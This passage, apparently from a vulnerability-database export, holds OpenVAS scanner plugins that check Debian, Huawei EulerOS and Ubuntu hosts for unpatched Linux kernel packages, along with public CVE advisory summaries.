isdpkgvuln(pkg:\"linux-headers-4.9.0-3-loongson-3\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-marvell\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-octeon\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-powerpc64le\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-686-pae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-s390x\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-kbuild-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-perf-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-4.9.0-3\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"usbip\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:51:01", "bulletinFamily": "scanner", "cvelist": 
["CVE-2017-13695", "CVE-2017-14489", "CVE-2017-13694", "CVE-2017-13693", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-1000370", "CVE-2017-1000371", "CVE-2017-12154"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-06-08T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171245", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171245", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1245)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1245\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-1000370\", \"CVE-2017-10661\", \"CVE-2017-12154\", \"CVE-2017-13693\", \"CVE-2017-13694\", \"CVE-2017-13695\", \"CVE-2017-14106\", \"CVE-2017-14140\", \"CVE-2017-14489\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:00:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1245)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1245\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1245\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1245 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 
allows local users to cause a denial of service (panic) by leveraging incorrect length validation.(CVE-2017-14489)\n\nThe move_pages system call in mm/migrate.c in the Linux kernel before 4.12.9 doesn't check the effective uid of the target process, enabling a local attacker to learn the memory layout of a setuid executable despite ASLR.(CVE-2017-14140)\n\nThe offset2lib patch as used in the Linux Kernel contains a vulnerability that allows a PIE binary to be execve()'ed with 1GB of arguments or environmental strings then the stack occupies the address 0x80000000 and the PIE binary is mapped above 0x40000000 nullifying the protection of the offset2lib patch. This affects Linux Kernel version 4.11.5 and earlier. This is a different issue than CVE-2017-1000371. This issue appears to be limited to i386 based systems.(CVE-2017-1000370)\n\nRace condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows local users to gain privileges or cause a denial of service (list corruption or use-after-free) via simultaneous file-descriptor operations that leverage improper might_cancel queueing.(CVE-2017-10661)\n\nThe acpi_ns_evaluate() function in drivers/acpi/acpica/nseval.c in the Linux kernel through 4.12.9 does not flush the operand cache and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13695)\n\nThe acpi_ps_complete_final_op() function in drivers/acpi/acpica/psobject.c in the Linux kernel through 4.12.9 does not flush the node and node_ext caches and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13694)\n\nThe acpi_ds_create_operands() function in drivers/acpi/acpica/dsutils.c in the Linux kernel through 4.12.9 does not flush the operand cache 
and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13693)\n\nThe tcp_disconnect function in net/ipv4/tcp.c in the Linux kernel before 4.12 allows local users to cause a denial of service (__tcp_select_window divide-by-zero error and system crash) by triggering a disconnect within a certain tcp_recvmsg code path.(CVE-2017-14106)\n\nThe native Bluetooth stack in the Linux Kernel (BlueZ), starti ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.49.1.149\", 
rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ori\", rpm:\"kernel-ori~3.10.0~229\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:48:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9806", "CVE-2017-11176", "CVE-2016-9794", "CVE-2016-9754", "CVE-2017-12188", "CVE-2017-1000111", "CVE-2016-9793", "CVE-2017-1000252", "CVE-2017-10810", "CVE-2017-11473", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-1000112", "CVE-2017-1000364", "CVE-2017-10911", "CVE-2017-1000410", "CVE-2017-1000370", "CVE-2017-12153", "CVE-2017-12154", "CVE-2017-11600", "CVE-2017-1000365"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-06-08T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191498", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1498)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# 
SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1498\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_cve_id(\"CVE-2016-9754\", \"CVE-2016-9793\", \"CVE-2016-9794\", \"CVE-2016-9806\", \"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000252\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000370\", \"CVE-2017-1000410\", \"CVE-2017-10661\", \"CVE-2017-10810\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-11600\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12188\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:56:59 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1498)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n 
script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1498\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1498\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1498 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An integer overflow vulnerability was found in the ring_buffer_resize() calculations in which a privileged user can adjust the size of the ringbuffer message size. These calculations can create an issue where the kernel memory allocator will not allocate the correct count of pages yet expect them to be usable. This can lead to the ftrace() output to appear to corrupt kernel memory and possibly be used for privileged escalation or more likely kernel panic.(CVE-2016-9754)\n\nA flaw was found in the Linux kernel's implementation of setsockopt for the SO_{SND<pipe>RCV}BUFFORCE setsockopt() system call. Users with non-namespace CAP_NET_ADMIN are able to trigger this call and create a situation in which the sockets sendbuff data size could be negative. This could adversely affect memory allocations and create situations where the system could crash or cause memory corruption.(CVE-2016-9793)\n\nA use-after-free vulnerability was found in ALSA pcm layer, which allows local users to cause a denial of service, memory corruption, or possibly other unspecified impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2016-9794)\n\nA double free vulnerability was found in netlink_dump, which could cause a denial of service or possibly other unspecified impact. 
Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2016-9806)\n\nA race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets are implemented in the Linux kernel networking subsystem handling synchronization. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) can use this issue to crash the system.(CVE-2017-1000111)\n\nAn exploitable memory corruption flaw was found in the Linux kernel. The append path can be erroneously switched from UFO to non-UFO in ip_ufo_append_data() when building an UFO packet with MSG_MORE option. If unprivileged user namespaces are available, this flaw can be exploited to gain root privileges.(CVE-2017-1000112)\n\nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64le), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execute ...\n\n Description truncated. 
Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": 
"2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16525", "CVE-2017-12188", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-16527", "CVE-2017-15537", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-12192", "CVE-2017-14156", "CVE-2017-1000255", "CVE-2017-16529", "CVE-2017-12153", "CVE-2017-16531", "CVE-2017-16534", "CVE-2017-14954", "CVE-2017-12154", "CVE-2017-16530", "CVE-2017-12190"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-22T00:00:00", "id": "OPENVAS:1361412562310843376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843376", "type": "openvas", "title": "Ubuntu Update for linux USN-3487-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3487_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3487-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843376\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-22 07:32:50 +0100 (Wed, 22 Nov 2017)\");\n script_cve_id(\"CVE-2017-12188\", \"CVE-2017-1000255\", \"CVE-2017-12153\", \"CVE-2017-12154\",\n \"CVE-2017-12190\", \"CVE-2017-12192\", \"CVE-2017-14156\", \"CVE-2017-14489\",\n \"CVE-2017-14954\", \"CVE-2017-15265\", \"CVE-2017-15537\", \"CVE-2017-15649\",\n \"CVE-2017-16525\", \"CVE-2017-16526\", \"CVE-2017-16527\", \"CVE-2017-16529\",\n \"CVE-2017-16530\", \"CVE-2017-16531\", \"CVE-2017-16533\", \"CVE-2017-16534\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3487-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the KVM subsystem in\n the Linux kernel did not properly keep track of nested levels in guest page\n tables. 
A local attacker in a guest VM could use this to cause a denial of\n service (host OS crash) or possibly execute arbitrary code in the host OS.\n (CVE-2017-12188) It was discovered that on the PowerPC architecture, the kernel\n did not properly sanitize the signal stack when handling sigreturn(). A local\n attacker could use this to cause a denial of service (system crash) or possibly\n execute arbitrary code. (CVE-2017-1000255) Bo Zhang discovered that the netlink\n wireless configuration interface in the Linux kernel did not properly validate\n attributes when handling certain requests. A local attacker with the\n CAP_NET_ADMIN could use this to cause a denial of service (system crash).\n (CVE-2017-12153) It was discovered that the nested KVM implementation in the\n Linux kernel in some situations did not properly prevent second level guests\n from reading and writing the hardware CR8 register. A local attacker in a guest\n could use this to cause a denial of service (system crash). (CVE-2017-12154)\n Vitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel did not\n properly track reference counts when merging buffers. A local attacker could use\n this to cause a denial of service (memory exhaustion). (CVE-2017-12190) It was\n discovered that the key management subsystem in the Linux kernel did not\n properly restrict key reads on negatively instantiated keys. A local attacker\n could use this to cause a denial of service (system crash). (CVE-2017-12192) It\n was discovered that the ATI Radeon framebuffer driver in the Linux kernel did\n not properly initialize a data structure returned to user space. A local\n attacker could use this to expose sensitive information (kernel memory).\n (CVE-2017-14156) ChunYu Wang discovered that the iSCSI transport implementation\n in the Linux kernel did not properly validate data structures. A local attacker\n could use this to cause a denial of service (system crash). 
(CVE-2017-14489)\n Alexander Potapenko discovered an information leak in the waitid implementation\n of the Linux kernel. A local attacker could use this to expose sensitive\n information (kernel memory). (CVE-2017-14954) It was discovered that a race\n condition existed in the ALSA subsystem of the Linux kernel when creating and\n deleting a port via ioctl(). A local attacker could use this to cause a denial\n of service (system crash) or possibly execute arbitrary code. (CVE-2017-15265)\n Dmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in the\n Linux kernel did not properly handl ... Description truncated, for more\n information please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3487-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3487-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = 